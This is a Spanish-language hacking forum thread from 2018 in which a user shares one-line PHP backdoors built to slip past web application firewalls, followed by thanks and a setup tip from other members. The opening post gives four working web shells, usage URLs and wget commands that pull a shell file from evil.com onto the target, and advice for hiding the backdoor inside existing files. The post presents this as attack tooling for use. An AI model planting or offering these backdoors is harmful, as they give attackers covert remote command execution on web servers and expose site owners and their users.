Underc0de

[In]Seguridad Informática => Bugs y Exploits => Shells => Mensaje iniciado por: Nobody en Julio 22, 2018, 10:34:35 PM

Título: [PHP] Lista de backdoors inúsuales [WAF Bypass].
Publicado por: Nobody en Julio 22, 2018, 10:34:35 PM
¡Hola a todos! ¿Cómo les va?

Estoy al tanto de la creciente necesidad de backdoors fáciles de camuflar y con capacidades para evadir Web Application Firewalls —WAF, de ahora en más—. Por lo cual, mediante esta publicación, les ofrezco una lista de backdoors de tan solo una línea, capaces de evadir WAF.

Advertencia: En esta lista no incluiré funciones obsoletas a partir de PHP 7.2.
Referencia: http://php.net/manual/en/migration72.deprecated.php

1. copy() - Requiere: allow_url_fopen. (nunca antes la vi, se me ocurrió recientemente)
Código (php) [Seleccionar]
<?php copy($_GET['s'], $_GET['d']);
Citar
¿CÓMO UTILIZAR?
file.php?s=http://evil.com/shell.txt&d=/var/www/shell.php

2. include() - Requiere: allow_url_fopen.
Código (php) [Seleccionar]
<?php include($_GET['x']);
Citar
¿CÓMO UTILIZAR?
file.php?x=http://evil.com/shell.php
Advertencia: Obtuve mejores resultados utilizando un servidor HTTP sin PHP, por ejemplo, en Python.

3. popen() - DETECTADA POR SHELLDETECTOR (http://www.shelldetector.com/).
Código (php) [Seleccionar]
<?php echo fread(popen($_GET['c'],'r'),1024*4);
Citar
¿CÓMO UTILIZAR?
file.php?c=wget -O shell.php http://evil.com/shell.txt
Advertencia: Aún siendo detectada, es mi favorita y funciona excelente.

4. file_put_contents()
Código (php) [Seleccionar]
<?php file_put_contents('_c.php','<?php '.$_GET['c'].' ?>'); include '_c.php'; unlink("_c.php");
Citar
¿CÓMO UTILIZAR?
file.php?c=system('wget -O shell.php http://evil.com/shell.txt');
Advertencia: unlink() es opcional, pues yo lo uso para no dejar un archivo con el código ejecutado.

SUGERENCIAS
Citar
1. Se puede anteponer @ en alguna función, para así evitar imprimir los errores de la misma. Esto es útil a la hora de esconder el backdoor dentro de un archivo.
2. Se puede reemplazar $_GET por $_REQUEST, así aceptando GET, POST y COOKIE como métodos de entrada.
3. Se puede utilizar isset() y __halt_compiler() para obtener una salida más limpia a la hora de esconder el backdoor dentro de un archivo.
Citar<?php if(isset($_GET['c']))echo fread(popen($_GET['c'],'r'),1024*4); __halt_compiler();
4. El tag de cierre de PHP no es necesario en un archivo que solo contenga código. Así mismo, se puede utilizar short tags, si éstos están habilitados.

Pues nada más... En realidad, es un post sencillito, pero seguramente a alguien le será útil  :)

Salutes,
Nobody.
Título: Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
Publicado por: Drok3r en Julio 26, 2018, 09:12:50 PM
Muy interesante...

Me permites compartirlo en mi fan page de facebook?

NOTA: Doy credito
Título: Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
Publicado por: arthusu en Julio 27, 2018, 01:18:47 PM
a lo mejor te interesa: http://arthusu.blogspot.com/2018/07/msfvenom-payload-creator-msfpc-by.html
Título: Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
Publicado por: blackdrake en Agosto 01, 2018, 05:32:04 AM
Muy buena recopilación @Nobody (https://underc0de.org/foro/index.php?action=profile;u=34246), muchas gracias, no conocía la de copy
Título: Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
Publicado por: Nobody en Agosto 01, 2018, 02:57:51 PM
Gracias @arthusu (https://underc0de.org/foro/index.php?action=profile;u=2961) y @blackdrake (https://underc0de.org/foro/index.php?action=profile;u=24972).

@Drok3r (https://underc0de.org/foro/index.php?action=profile;u=62743), si, puedes. No es necesario dar créditos!
Saludos.
Título: Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
Publicado por: RandomSoft en Marzo 08, 2019, 08:24:39 PM
Buen dia amigos,

Alguien podría explicarme un poco como funciona el backdoor

Citar2. include() - Requiere: allow_url_fopen.

estoy intentando ver como funciona tal como esta en el post, pero me queda la pantalla en blanco (no muestra nada), muy agradecido de antemano.

Saludos a todos
Título: Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
Publicado por: arthusu en Marzo 11, 2019, 12:48:29 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buen dia amigos,

Alguien podría explicarme un poco como funciona el backdoor

Citar2. include() - Requiere: allow_url_fopen.

estoy intentando ver como funciona tal como esta en el post, pero me queda la pantalla en blanco (no muestra nada), muy agradecido de antemano.

Saludos a todos

necesitas tener activado  allow_url_fopen en el archivo php.ini pones: allow_url_fopen = on, saludos